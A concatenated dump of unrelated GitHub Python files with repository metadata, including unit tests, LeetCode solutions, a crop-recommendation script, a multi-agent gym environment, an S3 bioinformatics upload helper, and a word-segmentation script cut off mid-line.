UniversityLoader(\n path='files', name='Stevens') # Creates the university loader.\n\n # Actual value as in the pretty table.\n actual = university.get_table_data_student()\n self.assertEqual(expected, actual)\n\n \"\"\"\n Tests if the instructor pretty table is correct.\n \"\"\"\n\n def test_instructor_table(self):\n\n # Expected value.\n expected = [['98760', 'Darwin, C', 'SYEN', 'SYS 800', 1], ['98760', 'Darwin, C', 'SYEN', 'SYS 750', 1], ['98760', 'Darwin, C', 'SYEN', 'SYS 611', 2], ['98760', 'Darwin, C', 'SYEN', 'SYS 645', 1], ['98763', 'Newton, I', 'SFEN', 'SSW 555', 1], ['98763', 'Newton, I', 'SFEN', 'SSW 689', 1], [\n '98764', 'Feynman, R', 'SFEN', 'SSW 564', 3], ['98764', 'Feynman, R', 'SFEN', 'SSW 687', 3], ['98764', 'Feynman, R', 'SFEN', 'CS 501', 1], ['98764', 'Feynman, R', 'SFEN', 'CS 545', 1], ['98765', 'Einstein, A', 'SFEN', 'SSW 567', 4], ['98765', 'Einstein, A', 'SFEN', 'SSW 540', 3]]\n university = UniversityLoader(\n path='files', name='Stevens')\n # Actual value\n actual = university.get_table_data_instructors()\n self.assertEqual(expected, actual)\n\n \"\"\"\n Checks if the file not found is raised.\n \"\"\"\n\n def test_file_not_found(self):\n with self.assertRaises(FileNotFoundError):\n UniversityLoader(\n path='file', name='Stevens')\n\n \"\"\"\n Checks if the instructor or student is not present.\n \"\"\"\n\n def test_instructor_or_student_not_found(self):\n with self.assertRaises(KeyError):\n UniversityLoader(\n path='files_data_not_found', name='Stevens')\n\n \"\"\"\n Checks if all the files are correct.\n \"\"\"\n\n def test_wrong_no_of_fields(self):\n with self.assertRaises(ValueError):\n UniversityLoader(\n path='files_wrong_no_fileds', name='Stevens')\n\n \"\"\"\n Checks if any duplicate values are present in the files.\n \"\"\"\n\n def test_duplicate_student_instructors(self):\n with self.assertRaises(KeyError):\n UniversityLoader(\n path='files_duplicate', name='Stevens')\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=2)\n","repo_name":"yashlimbasiya/Student-Repository","sub_path":"Student_Repository_TEST_Yash_Lambasiya.py","file_name":"Student_Repository_TEST_Yash_Lambasiya.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72844179432","text":"import random\n\n\ndef main():\n words = [\"boy\", \"girl\", \"cat\", \"dog\", \"bird\", \"house\"]\n word = random.choice(words)\n cap_word = word.capitalize()\n\n for _ in range(6):\n quantity = random.randint(1, 3)\n tense = random.choice([\"past\", \"present\", \"future\"])\n\n sentence = make_sentence(quantity, tense)\n print(sentence.capitalize())\n\n\ndef make_sentence(quantity, tense):\n determiner = get_determiner(quantity)\n adjective = get_adjective()\n adverb = get_adverb()\n noun = get_noun(quantity)\n verb = get_verb(quantity, tense)\n prepositional_phrase1 = get_prepositional_phrase(quantity)\n prepositional_phrase2 = get_prepositional_phrase(quantity)\n\n sentence = f\"{determiner} {adjective} {noun} {verb} {adverb} {prepositional_phrase1} {prepositional_phrase2}.\"\n return sentence\n\n\ndef get_determiner(quantity):\n if quantity == 1:\n determiners = [\"a\", \"one\", \"the\"]\n else:\n determiners = [\"some\", \"many\", \"the\"]\n\n determiner = random.choice(determiners)\n return determiner\n\n\ndef get_noun(quantity):\n if quantity == 1:\n nouns = [\"bird\", \"boy\", \"car\", \"cat\", \"child\",\n \"dog\", \"girl\", \"man\", \"rabbit\", \"woman\"]\n else:\n nouns = [\"birds\", \"boys\", \"cars\", \"cats\", \"children\",\n \"dogs\", \"girls\", \"men\", \"rabbits\", \"women\"]\n\n noun = random.choice(nouns)\n return noun\n\n\ndef get_verb(quantity, tense):\n if tense == \"past\":\n verbs = [\"drank\", \"ate\", \"grew\", \"laughed\", \"thought\",\n \"ran\", \"slept\", \"talked\", \"walked\", \"wrote\"]\n elif tense == \"present\" and quantity == 1:\n verbs = [\"drinks\", \"eats\", \"grows\", \"laughs\", \"thinks\",\n \"runs\", \"sleeps\", \"talks\", \"walks\", \"writes\"]\n elif tense == \"present\" and quantity != 1:\n verbs = [\"drink\", \"eat\", \"grow\", \"laugh\", \"think\",\n \"run\", \"sleep\", \"talk\", \"walk\", \"write\"]\n elif tense == \"future\":\n verbs = [\"will drink\", \"will eat\", \"will grow\", \"will laugh\", \"will think\",\n \"will run\", \"will sleep\", \"will talk\", \"will walk\", \"will write\"]\n else:\n print(\"Type the correct tense.\")\n return None\n\n verb = random.choice(verbs)\n return verb\n\n\ndef get_preposition():\n \"\"\"Return a randomly chosen preposition\n from this list of prepositions:\n \"about\", \"above\", \"across\", \"after\", \"along\",\n \"around\", \"at\", \"before\", \"behind\", \"below\",\n \"beyond\", \"by\", \"despite\", \"except\", \"for\",\n \"from\", \"in\", \"into\", \"near\", \"of\",\n \"off\", \"on\", \"onto\", \"out\", \"over\",\n \"past\", \"to\", \"under\", \"with\", \"without\"\n\n Return: a randomly chosen preposition.\n \"\"\"\n prepositions = [\"about\", \"above\", \"across\", \"after\", \"along\",\n \"around\", \"at\", \"before\", \"behind\", \"below\",\n \"beyond\", \"by\", \"despite\", \"except\", \"for\",\n \"from\", \"in\", \"into\", \"near\", \"of\",\n \"off\", \"on\", \"onto\", \"out\", \"over\",\n \"past\", \"to\", \"under\", \"with\", \"without\"]\n\n preposition = random.choice(prepositions)\n return preposition\n\n\ndef get_prepositional_phrase(quantity):\n \"\"\"Build and return a prepositional phrase composed\n of three words: a preposition, a determiner, and a\n noun by calling the get_preposition, get_determiner,\n and get_noun functions.\n\n Parameter\n quantity: an integer that determines if the\n determiner and noun in the prepositional\n phrase returned from this function should\n be single or plural.\n Return: a prepositional phrase.\n \"\"\"\n preposition = get_preposition()\n determiner = get_determiner(quantity)\n noun = get_noun(quantity)\n\n prepositional_phrase = f\"{preposition} {determiner} {noun}\"\n return prepositional_phrase\n\n\ndef get_adjective():\n \"\"\"Return a randomly chosen adjective from a list of adjectives.\n\n Return: a randomly chosen adjective.\n \"\"\"\n adjectives = [\"beautiful\", \"smart\", \"funny\", \"tall\", \"brave\",\n \"kind\", \"friendly\", \"creative\", \"happy\", \"strong\"]\n\n adjective = random.choice(adjectives)\n return adjective\n\n\ndef get_adverb():\n \"\"\"Return a randomly chosen adverb from a list of adverbs.\n\n Return: a randomly chosen adverb.\n \"\"\"\n adverbs = [\"quickly\", \"carefully\", \"eagerly\", \"happily\", \"loudly\",\n \"gracefully\", \"patiently\", \"silently\", \"vigorously\", \"warmly\"]\n\n adverb = random.choice(adverbs)\n return adverb\n\n\nmain()\n","repo_name":"djhi12/programming_with_functions","sub_path":"week2/sentences.py","file_name":"sentences.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17367699080","text":"# Leetcode\n# 61. Rotate List\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def rotateRight(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if not head: \n return head\n \n current = tail = head\n\n length = 1\n while tail.next:\n length += 1\n tail = tail.next \n \n # handle case where k is bigger than the length of the list.\n k = k % length\n # handle case where k is equal to the length of the list. \n if k == 0: \n return head \n\n current = head\n for _ in range(length-k-1):\n current = current.next \n new_head = current.next # Split the linked list after pointer has been moved k times. new_head has the 2nd part of the linked list and current has the 1st part of the linked list. \n current.next = None # Set the EOL to the last element of the first list. \n tail.next = head # Join the head of the first linked list to the end of the second linked list. \n return new_head\n","repo_name":"ayeshsalah/coding-interview-prep","sub_path":"leetcode/61_RotateList.py","file_name":"61_RotateList.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8834801185","text":"import pandas as pd\nimport sys,os\nimport numpy as np\nsys.stdout.flush()\nfile = sys.argv[1]\ndf = pd.read_csv(file,index_col=0,header=0,sep=',')\nMAF = []\nfor i in range(0,df.shape[1]):\n\ttable = df.iloc[:,i].value_counts()\n\tif max(table) <= 383*0.95:\n\t\tMAF.append(df.columns[i])\n\ndf2 = df.loc[:,MAF]\n\nnum = df2.isna().sum()\nnum50 = num[num<=38]\nnum75 = num[num<=8]\nnum90 = num[num<=2]\ndf50 = df2.loc[:,num50.index]\ndf75 = df2.loc[:,num75.index]\ndf90 = df2.loc[:,num90.index]\ndf50.to_csv(file + '_50per',index=True, header=True,sep=\",\")\ndf75.to_csv(file + '_75per',index=True, header=True,sep=\",\")\ndf90.to_csv(file + '_90per',index=True, header=True,sep=\",\")\n\n","repo_name":"ShiuLab/Manuscript_Code","sub_path":"2023_Ath_multi-omics/Data_preprocessing/03_methylomic_matrix/2_single_site_methylation_P_A/14_keep_50_75_90_percentile_MAF.py","file_name":"14_keep_50_75_90_percentile_MAF.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"70113104232","text":"from input import *\r\nimport unittest\r\n\r\nclass TestPortObjects(unittest.TestCase):\r\n\r\n def test_port(self):\r\n ships, ports, containers, items = get_data()\r\n self.assertEqual(ports[0].current_ships, ships[:3])\r\n self.assertEqual(ports[1].load_item_to_container(ports[1].items[0], ports[1].containers[0]), '<-This Item was loaded in Container->')\r\n self.assertEqual(ports[1].load_item_to_container(ports[1].items[-2], ports[1].containers[0]), '<-This Item to heavy to load in Container->')\r\n\r\n def test_ship(self):\r\n ships, ports, containers, items = get_data()\r\n self.assertEqual(ships[0].sail_to(ports[0]), 'Ship already is in this port')\r\n self.assertEqual(ships[0].sail_to(ports[1]), '<-The Ship does\\'nt have enough fuel to sail->')\r\n ships[0].refuel(50000)\r\n self.assertEqual(ships[0].sail_to(ports[1]), '<-Ship starts going to new Port->')\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"TwoUfo/Patern_FEP21","sub_path":"Тисовський Олег/Patern-Lab-3/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"170036719","text":"from dataclasses import asdict\n\nimport pytest\n\nfrom sendr_utils import alist, utcnow\n\nfrom mail.payments.payments.core.entities.arbitrage import Arbitrage, ArbitrageStatus\nfrom mail.payments.payments.storage.mappers.arbitrage import ArbitrageDataDumper, ArbitrageDataMapper\n\n\nclass TestArbitrageDataMapper:\n def test_map(self, arbitrage):\n row = {\n type(arbitrage).__name__ + '__' + key: value\n for key, value in asdict(arbitrage).items()\n }\n mapped = ArbitrageDataMapper()(row)\n assert mapped == arbitrage\n\n\nclass TestArbitrageDataDumper:\n def test_unmap(self, arbitrage):\n assert ArbitrageDataDumper()(arbitrage) == asdict(arbitrage)\n\n\nclass TestArbitrageMapper:\n @pytest.fixture\n def now(self, mocker):\n now = utcnow()\n mocker.patch('mail.payments.payments.storage.mappers.arbitrage.func.now', mocker.Mock(return_value=now))\n return now\n\n @pytest.mark.asyncio\n async def test_get(self, arbitrage, storage):\n from_db = await storage.arbitrage.get(arbitrage.arbitrage_id)\n assert from_db == arbitrage\n\n @pytest.mark.asyncio\n async def test_get_by_escalate_id(self, arbitrage, storage):\n from_db = await storage.arbitrage.get_by_escalate_id(arbitrage.escalate_id)\n assert from_db == arbitrage\n\n @pytest.mark.parametrize('field', ('chat_id', 'arbiter_chat_id', 'escalate_id', 'status'))\n @pytest.mark.asyncio\n async def test_find(self, field, arbitrage, storage):\n from_db = await alist(storage.arbitrage.find(filters={field: getattr(arbitrage, field)}))\n assert from_db == [arbitrage]\n\n @pytest.mark.parametrize('field', ('chat_id', 'arbiter_chat_id', 'escalate_id', 'status'))\n @pytest.mark.asyncio\n async def test_save(self, field, arbitrage, storage, rands, randitem, now):\n setattr(arbitrage, field, randitem(ArbitrageStatus) if field == 'status' else rands())\n await storage.arbitrage.save(arbitrage)\n from_db = await storage.arbitrage.get(arbitrage.arbitrage_id)\n assert from_db == arbitrage\n\n @pytest.mark.asyncio\n async def test_ignore_created_during_save(self, arbitrage, storage):\n arbitrage.created = utcnow()\n await storage.arbitrage.save(arbitrage)\n from_db = await storage.arbitrage.get(arbitrage.arbitrage_id)\n assert from_db.created != arbitrage.created\n\n @pytest.mark.asyncio\n async def test_get_current(self, storage, arbitrage):\n returned = await storage.arbitrage.get_current(arbitrage.uid, arbitrage.order_id)\n assert arbitrage == returned\n\n @pytest.mark.asyncio\n async def test_get_by_refund_id(self, refund, storage, arbitrage):\n returned = await storage.arbitrage.get_by_refund_id(arbitrage.uid, arbitrage.refund_id)\n assert arbitrage == returned\n\n @pytest.mark.asyncio\n async def test_no_get_current_via_status(self, storage, arbitrage):\n arbitrage.status = ArbitrageStatus.COMPLETE\n arbitrage = await storage.arbitrage.save(arbitrage)\n assert await storage.arbitrage.get_current(arbitrage.uid, arbitrage.order_id) is None\n\n @pytest.mark.asyncio\n async def test_no_get_current_via_absent(self, storage, order):\n assert await storage.arbitrage.get_current(order.uid, order.order_id) is None\n\n @pytest.mark.asyncio\n async def test_delete(self, storage, arbitrage):\n await storage.arbitrage.get(arbitrage.arbitrage_id)\n await storage.arbitrage.delete(arbitrage)\n\n with pytest.raises(Arbitrage.DoesNotExist):\n await storage.arbitrage.get(arbitrage.arbitrage_id)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/unit/storage/mappers/test_arbitrage.py","file_name":"test_arbitrage.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41734749435","text":"\"\"\"Descrição\nMiguelito gosta muito de séries numéricas e resolveu criar uma com seu nome. O primeiro valor da série de Miguelito é 3, e cada novo número é gerado somando-se ora 4 ora 1 ao valor anterior, de acordo com o exemplo abaixo:\n\n3 7 8 12 13 17 18 22 23 27 ...\n\nEscreva uma função recursiva chamada SerieMiguelito que receba como entrada o índice do elemento na sequência e retorne seu valor.\n\nFormato de entrada\n\nUm valor inteiro\n\nFormato de saída\n\nUm valor inteiro\"\"\"\n\n\ndef Serie_de_Miguelito (indice):\n\n lista_serie_Miguelito = [3]\n SOMA_1 = 1\n SOMA_4 = 4\n \n for i in range (indice-1):\n termo_MIguelito = lista_serie_Miguelito[i]\n\n if i % 2 != 0:\n lista_serie_Miguelito.append(termo_MIguelito+SOMA_1)\n else:\n lista_serie_Miguelito.append(termo_MIguelito+SOMA_4)\n \n return (print(lista_serie_Miguelito[indice-1]))\n\n\nindice = int (input())\n\nSerie_de_Miguelito(indice)","repo_name":"Andreza-S/Codando","sub_path":"códigos python/Serie de Miguelito.py","file_name":"Serie de Miguelito.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4232668487","text":"import os\n\ndef darth(accession, contigs_filename, s3, s3_folder, outputBucket, has_reads = False):\n os.system(\"mkdir -p /serratus-data/\" +accession +\".darth\")\n os.chdir(\"/serratus-data/\" + accession + \".darth\")\n reads = ('/serratus-data/' +accession+\".fastq\") if has_reads else \"none\"\n os.system(' '.join([\"darth.sh\",accession,'/serratus-data/' + contigs_filename, reads, '/darth', \"/serratus-data/\" + accession + \".darth\",str(8)]))\n try:\n s3.upload_file(\"pfam/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.pfam.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n s3.upload_file(\"pfam/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n except:\n print(\"cannot upload\", accession + \".darth/pfam/alignments.fasta\",flush=True)\n try:\n s3.upload_file(\"transeq/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.transeq.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n s3.upload_file(\"transeq/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n except:\n print(\"cannot upload\", accession + \".darth/transeq/alignments.fasta\",flush=True)\n os.chdir(\"/serratus-data/\")\n os.system(\"tar -zcvf \"+ accession + \".darth.tar.gz \" + accession + \".darth\")\n s3.upload_file(accession + \".darth.tar.gz\", outputBucket, s3_folder + contigs_filename + \".darth.tar.gz\", ExtraArgs={'ACL': 'public-read'})\n os.system(\"rm -Rf \"+accession+\".darth/read-analysis\")\n os.system(\"tar -zcvf \"+ accession + \".darth.stripped.tar.gz \" + accession + \".darth\")\n s3.upload_file(accession + \".darth.stripped.tar.gz\", outputBucket, s3_folder + contigs_filename + \".darth.stripped.tar.gz\", ExtraArgs={'ACL': 'public-read'})\n # to verify which file darth was run on \n os.system(\"md5sum \" + contigs_filename+ \" > \" + accession + \".darth.input_md5\")\n s3.upload_file(accession + \".darth.input_md5\", outputBucket, s3_folder + contigs_filename + \".darth.input_md5\", ExtraArgs={'ACL': 'public-read'})\n\n","repo_name":"serratus-bio/serratus-batch-assembly","sub_path":"src/darth.py","file_name":"darth.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1436838420","text":"class Solution:\n def totalFruit(self, fruits: List[int]) -> int:\n N = len(fruits)\n lo, ans = 0, 0\n curr = defaultdict(int)\n for hi in range(N):\n curr[fruits[hi]] += 1\n if len(curr) <= 2: ans = max(ans, hi-lo+1)\n while len(curr) > 2:\n curr[fruits[lo]] -= 1\n if curr[fruits[lo]] == 0:\n curr.pop(fruits[lo])\n lo += 1\n return ans\n","repo_name":"henryliuser/hliu-cp","sub_path":"leetcode/medium/fruits_into_baskets.py","file_name":"fruits_into_baskets.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"38760873649","text":"# Importing libraries\nimport requests\nimport json\nimport pandas as pd\nimport numpy as np \nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\nfrom sklearn import tree\nimport warnings\nimport csv\nwarnings.filterwarnings('ignore')\n\n\"\"\"inputfile=open('soil_comp.json','r')\ninputdata=inputfile.read()\nobj=json.loads(inputdata)\nN=obj['N']\nP=obj['P']\nK=obj['K']\nPh=obj['Ph']\n\"\"\"\n\nglobal NaiveBayes\n\ncropRecommend='utils/data/Crop_recommendation.csv'\nmodelpkl = 'models/NBClassifier.pkl'\ntestsoilcomp = 'utils/data/test_with_soil_comp.csv'\nbioFertilizers = 'utils/data/bio_fertilizers.csv'\n \ndef train():\n df = pd.read_csv(cropRecommend)\n df['label'].unique()\n features = df[['N', 'P', 'K', 'temperature', 'humidity', 'ph', 'rainfall']]\n target = df['label']\n # features = df[['temperature', 'humidity', 'ph', 'rainfall']]\n labels = df['label']\n # Initialzing empty lists to append all model's name and corresponding name\n acc = []\n model = []\n # Splitting into train and test data\n\n from sklearn.model_selection import train_test_split\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(features, target, test_size=0.2, random_state=2)\n\n from sklearn.naive_bayes import GaussianNB\n\n NaiveBayes = GaussianNB()\n\n NaiveBayes.fit(Xtrain, Ytrain)\n\n import pickle\n # Dump the trained Naive Bayes classifier with Pickle\n NB_pkl_filename = modelpkl\n # Open the file to save as pkl file\n NB_Model_pkl = open(NB_pkl_filename, 'wb')\n pickle.dump(NaiveBayes, NB_Model_pkl)\n # Close the pickle instances\n NB_Model_pkl.close()\n return NaiveBayes\n\ndef pred_crop(N,P,K,Ph,lat,long,NaiveBayes):\n \"\"\"N = input(\"Enter the Nitrogen \")\n P = input(\"Enter the phosphorous \")\n K = input(\"Enter the potassium \")\n Ph = input(\"Enter the PH value \")\n\n lat = input('lat')\n long = input('long')\"\"\"\n\n BASE_URL = \"https://api.openweathermap.org/data/2.5/onecall?\"\n url = BASE_URL + \"lat=\" + lat + \"&lon=\" + long + \"&appid=d4052e83125817ea8f211eeafa15c47d\"\n\n headers = {\n 'x-rapidapi-key': \"d4052e83125817ea8f211eeafa15c47d\"\n }\n response = requests.request(\"GET\", url, headers=headers)\n x = response.json()\n\n current = x[\"current\"]\n try:\n current_rain = current[\"rain\"]\n rainfall = current[\"1h\"]\n except:\n rainfall = 0\n\n temp = current[\"temp\"] - 273.15\n temp = \"{:.2f}\".format(temp)\n humidity = current[\"humidity\"]\n\n with open(testsoilcomp, 'w', newline='') as csvfile:\n fieldnames = ['N',\n 'P', 'K',\n 'temperature', 'humidity', 'ph', 'rainfall']\n\n thewriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n thewriter.writeheader()\n\n thewriter.writerow({'N': N,\n 'P': P, 'K': K,\n 'temperature': temp, 'humidity': humidity, 'ph': Ph, 'rainfall': rainfall})\n\n x_test = pd.read_csv(testsoilcomp)\n prediction = NaiveBayes.predict(x_test)\n # print(prediction[0])\n pred = prediction[0]\n\n df = pd.read_csv(bioFertilizers)\n\n Bio_fertilizer = df[df['Crop'] == pred]['Bio_fertilizer'].iloc[0]\n Intercrop = df[df['Crop'] == pred]['Intercrop'].iloc[0]\n\n\n data = {\n \"predicted_crop\": pred,\n \"biofertilizer\": Bio_fertilizer,\n \"Intercrop\": Intercrop,\n\n }\n return data\n\n\n\ndef crop_recommendation(N,P,K,Ph,lat,lon):\n model = train()\n data =pred_crop(N,P,K,Ph,lat,lon,model)\n return data\n\n","repo_name":"mansigupta163/AI-Agventure","sub_path":"utils/crop_recommendation.py","file_name":"crop_recommendation.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28345123709","text":"import constants\nimport random\nimport numpy as np\nimport gym\nfrom gym.spaces import Box\nfrom pprint import PrettyPrinter\nimport copy\nimport pandas as pd\nfrom gamelogic import HoneyCombGame\nfrom collections import defaultdict\nfrom typing import Tuple\n\n\nclass HoneyCombEnv(gym.Env):\n \"\"\"\n The HoneyComb Game:\n The parameters of the game are set in the constants.py file.\n Several agents are positioned on a hexagonal playing field, where there\n are 7 actions available to them, i.e., moving to an adjacent field (6 actions)\n and a void action (1 action) that allows them to stay on the current field.\n The agents receive a reward for terminating the game on one of 6 reward fields\n located at the edges of the playing field.\n NUM_INFORMED agents (biased agents) are aware of a special payoff field, that increases their reward\n by a factor of 2.\n The agent's state is returned as a numpy vector, containing the positions of all\n agents as well as the distance to the reward fields. The biased agents are additionally aware of the \n special payoff field.\n Actions are submitted as a numpy array of integers, where the integer at index i coresponds to agent\n i's action.\n \"\"\"\n\n # NOTE: The make_states, step and compute_rewards functions have been adjusted to fit their code\n\n def __init__(\n self,\n max_turns: int = 15,\n alternative_states: int = True\n ):\n\n self.use_alternative_states = alternative_states\n self.agents = constants.NUM_UNINFORMED + constants.NUM_INFORMED\n self.action_space = self.agents * [gym.spaces.Discrete(7)]\n obs_dim = self.agents * 2 + len(constants.PAYOFF_LOCATIONS) * 2 + 2 + 1\n self.observation_space = self.agents * [Box(-np.inf, np.inf, shape=(obs_dim,))]\n self.num_informed = constants.NUM_INFORMED\n self.max_turns = max_turns\n self.game = HoneyCombGame(self.agents, max_turns)\n self.done = False\n\n # Call reset here to initialize gamefield\n self.reset()\n\n def step(self, actions: np.ndarray) -> Tuple[np.ndarray, np.ndarray, bool, str]:\n \"\"\"\n Implementation of the agent-environment interaction.\n Performs one time step of environment dynamics.\n :param actions: an action provided by the agent (one-hot index)\n :return: state, rewards, done, info\n \"\"\"\n\n int_actions = [np.where(r == 1)[0][0] for r in np.vstack(actions)]\n for agent in range(self.agents):\n action = int_actions[agent]\n valid_move = self.game.submit_move_for_agent(\n agent, constants.ACTIONS[action]\n )\n\n self.turns_count += 1\n done = np.array([False] * self.agents).reshape(1, -1)\n\n if self.game.check_all_arrived() or self.turns_count >= self.max_turns:\n if self.game.check_all_arrived():\n print(\"reached goals after %i \" % self.turns_count)\n done = np.array([True] * self.agents).reshape(1, -1)\n\n rewards = self.compute_reward(done)\n\n if self.use_alternative_states:\n states = self.make_alternative_states()\n else:\n states = self.make_states()\n\n return states, rewards, done, {\"Not Implemented\": \"\"}\n\n # At the end of an episode call reset_game\n def reset(self) -> np.ndarray:\n \"\"\"\n At the end of an episode call reset to initialize a new playing field.\n :return: current state\n \"\"\"\n # Initialize a new gamefield\n self.game.reset_game()\n self.turns_count = 0\n\n self.payoff_fields = constants.PAYOFF_LOCATIONS\n self.special_payoff_fields = random.sample(self.payoff_fields, 1)\n\n return self.make_alternative_states()\n\n def compute_reward(self, done: np.ndarray) -> np.ndarray:\n \"\"\"\n Compute the rewards for each agent.\n :done: Array indicating the done status for each agent\n :return: rewards\n \"\"\"\n rewards = [0.0 for i in range(self.agents)]\n rewarded_fields = defaultdict(float)\n if done[0][0]:\n # Get rewards for all rew fields with agents on\n for agent in range(self.agents):\n pos = self.game.get_agent_pos(agent)\n if pos in self.payoff_fields:\n rewarded_fields[pos] += 1.0\n\n for agent in range(self.agents):\n pos = self.game.get_agent_pos(agent)\n rewards[agent] += rewarded_fields.get(pos, 0.0)\n if agent < self.num_informed and pos in self.special_payoff_fields:\n rewards[agent] *= 2\n\n rewards = np.array(rewards).reshape(1, -1)\n return rewards\n\n def make_states(self) -> np.ndarray:\n \"\"\"\n Reflects the current state of the environment, as seen by each agent.\n :return: array with states for all agents\n \"\"\"\n state = []\n for agent in range(self.agents):\n r, c = self.game.get_agent_pos(agent)\n state.append(r)\n state.append(c)\n for field in constants.PAYOFF_LOCATIONS:\n r, c = field\n state.append(r)\n state.append(c)\n state.append(self.turns_count)\n for field in self.special_payoff_fields:\n r, c = field\n state.append(r)\n state.append(c)\n\n informed_state = np.array(state)\n uninformed_state = copy.deepcopy(informed_state)\n uninformed_state[-2:] = 0\n\n states = [\n informed_state if i < self.num_informed else uninformed_state\n for i in range(self.agents)\n ]\n states = np.stack(states, axis=0)\n\n return states\n\n def make_alternative_states(self) -> np.ndarray:\n \"\"\"\n Reflects the current state of the environment, as seen by each agent.\n In this case, positions are normalised and distances to reward fields are \n reported rather than their position on the playing field.\n :return: array with states for all agents\n \"\"\"\n states = []\n for agent in range(self.agents):\n agent_state = []\n\n # Own distance\n r, c = self.game.get_agent_pos(agent)\n agent_state.append(r / 6)\n agent_state.append(c / 6)\n\n # Distances to others\n distances_r = [\n (r - pos[0]) / 12\n for key, pos in self.game.agent_positions.items()\n if key != agent\n ]\n distances_c = [\n (c - pos[1]) / 12\n for key, pos in self.game.agent_positions.items()\n if key != agent\n ]\n agent_state += distances_r\n agent_state += distances_c\n\n # Goal distances\n distances_goal_r = [(r - pos[0]) / 12 for pos in self.payoff_fields]\n distances_goal_c = [(c - pos[1]) / 12 for pos in self.payoff_fields]\n agent_state += distances_goal_r\n agent_state += distances_goal_c\n\n if agent < self.num_informed:\n agent_state.append((r - self.special_payoff_fields[0][0]) / 12)\n agent_state.append((c - self.special_payoff_fields[0][1]) / 12)\n else:\n agent_state += [0, 0]\n agent_state.append(self.max_turns - self.turns_count)\n states.append(np.array(agent_state))\n\n states = np.stack(states, axis=0)\n return states\n\n def render(self, **kwargs):\n \"\"\"\n Prints gamefield as matrix.\n :return: A numpy array containing the gamefield.\n \"\"\"\n return print(self.game.agent_positions)\n\n\nif __name__ == \"__main__\":\n env = HoneyCombEnv()\n for i in range(50):\n actions = [random.randint(0, 6) for i in range(10)]\n one_hot_actions = [np.array([0,0,0,0,0,0,0]) for i in actions]\n for i in range(len(actions)):\n one_hot_actions[i][actions[i]] = 1\n one_hot_actions = np.array(one_hot_actions)\n \n print(actions)\n print(one_hot_actions)\n env.render()\n state, rew, done, info = env.step(one_hot_actions)\n print(state[0])\n print(state[8])\n print(env.game.agent_positions)\n print(\"----------------\")\n","repo_name":"pauljpritz-zz/HoneyComb-Python-Environment","sub_path":"hc_env/honeycomb_env.py","file_name":"honeycomb_env.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12127210639","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"Program\n\n\n\n\"\"\"\n\n\nfrom typing import Optional\nfrom stool.stool import get_in_out_file_names\n\n\nDICTIONARY_PATH = r\"words_for_ai1.txt\"\nIN_FILE_NAME, OUT_FILE_NAME = get_in_out_file_names()\n\n\nwith open(DICTIONARY_PATH, 'r', encoding='UTF-8') as file:\n DICTIONARY = {phrase for phrase in file.read().split()}\n\n\ndef solve(input_file: str, output_file: str) -> None:\n def division_length(path: list[str]) -> int:\n return sum([len(phrase)**2 for phrase in path])\n\n def find_optimal_divisions(phrase: str, memo) -> Optional[list[str]]:\n if phrase in memo:\n return memo[phrase]\n if phrase in DICTIONARY:\n return [phrase]\n best_path = None\n # Find possible division points that can create meaningful words.\n division_indexes = [i for i in range(1, len(phrase) + 1) if phrase[:i] in DICTIONARY][::-1]\n if division_indexes:\n words, remainders = [phrase[:i] for i in division_indexes], [phrase[i:] for i in division_indexes]\n for word, remainder in zip(words, remainders):\n remainder_division = find_optimal_divisions(remainder, memo)\n if remainder_division is not None:\n result = [word] + remainder_division\n if best_path is None or division_length(result) > division_length(best_path):\n best_path = result\n memo[phrase] = result\n else:\n memo[phrase] = None\n\n return best_path\n\n with open(input_file, 'r', encoding='utf-8') as in_file, open(output_file, 'w', encoding='utf-8') as out_file:\n for line in in_file.read().split():\n out_file.write(' '.join(find_optimal_divisions(line, {})) + '\\n')\n\n\nif __name__ == '__main__':\n solve(IN_FILE_NAME, 